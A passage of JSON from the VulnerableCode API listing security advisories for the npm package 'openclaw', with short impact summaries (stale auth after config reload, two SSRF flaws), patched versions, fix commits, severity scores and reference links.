ugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41336","GHSA-3qpv-xf3v-mm45"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vx5d-3d98-7kf3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89488?format=json","vulnerability_id":"VCID-vy8v-np82-r3b5","summary":"OpenClaw: resolvedAuth closure becomes stale after config reload\n## Impact\n\nresolvedAuth closure becomes stale after config reload.\n\nAfter a config reload, newly accepted gateway connections could continue using stale resolved auth state.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41916","reference_id":"","reference_type":"","scores":[{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.2519","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25127","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25176","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41916"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-68x5-xx89-w9mm","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:00:46Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-68x5-xx89-w9mm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41916","reference_id":"CVE-2026-41916","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41916"},{"reference_url":"https://github.com/advisories/GHSA-68x5-xx89-w9mm","reference_id":"GHSA-68x5-xx89-w9mm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-68x5-xx89-w9mm"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-stale-authentication-state-via-config-reload","reference_id":"openclaw-stale-authentication-state-via-config-reload","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:00:46Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-stale-authentication-state-via-config-reload"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-41916","GHSA-68x5-xx89-w9mm"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vy8v-np82-r3b5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89518?format=json","vulnerability_id":"VCID-vz7k-r7c4-ebfg","summary":"OpenClaw: Browser CDP profile creation skipped strict-mode SSRF checks\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nBrowser profile creation normalized `cdpUrl` values before persisting them, but did not apply the configured browser SSRF policy at creation time. In deployments that explicitly disabled private-network CDP targets, a stored profile could still point at a private-network or metadata endpoint and later be probed by normal profile status flows.\n\nDefault trusted-operator browser behavior allows private-network CDP endpoints, so this only affected strict-mode deployments. Severity is low.\n\n## Fix\n\nOpenClaw now checks CDP endpoints against the browser SSRF policy during profile creation and reachability operations.\n\nFix commits:\n\n- `1fd049e3074cac72f6734a7fe88468c84f5f8bd7`\n- `e90c89cf8b1459f2aa1f3a665be67392b6c03fdf`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1fd049e3074cac72f6734a7fe88468c84f5f8bd7","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1fd049e3074cac72f6734a7fe88468c84f5f8bd7"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e90c89cf8b1459f2aa1f3a665be67392b6c03fdf","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e90c89cf8b1459f2aa1f3a665be67392b6c03fdf"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c5-89f5-f3pm","reference_id":"","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c5-89f5-f3pm"},{"reference_url":"https://github.com/advisories/GHSA-j4c5-89f5-f3pm","reference_id":"GHSA-j4c5-89f5-f3pm","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j4c5-89f5-f3pm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["GHSA-j4c5-89f5-f3pm"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vz7k-r7c4-ebfg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89125?format=json","vulnerability_id":"VCID-w2rd-2j4p-gfgw","summary":"OpenClaw affected by SSRF via unguarded image download in fal provider\n## Summary\n\nThe fal provider used raw fetches for both provider API traffic and returned image download URLs instead of the existing SSRF-guarded fetch path.\n\n## Impact\n\nA malicious or compromised fal relay could make the gateway fetch internal URLs and expose metadata or internal service responses through the image pipeline.\n\n## Affected Component\n\n`extensions/fal/image-generation-provider.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `80d1e8a11a` (`fal: guard image fetches`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34504","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17232","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17236","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17891","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34504"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:21:09Z/"}],"url":"https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:21:09Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34504","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34504"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:L/SA:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:21:09Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider"},{"reference_url":"https://github.com/advisories/GHSA-qxgf-hmcj-3xw3","reference_id":"GHSA-qxgf-hmcj-3xw3","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qxgf-hmcj-3xw3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerabilit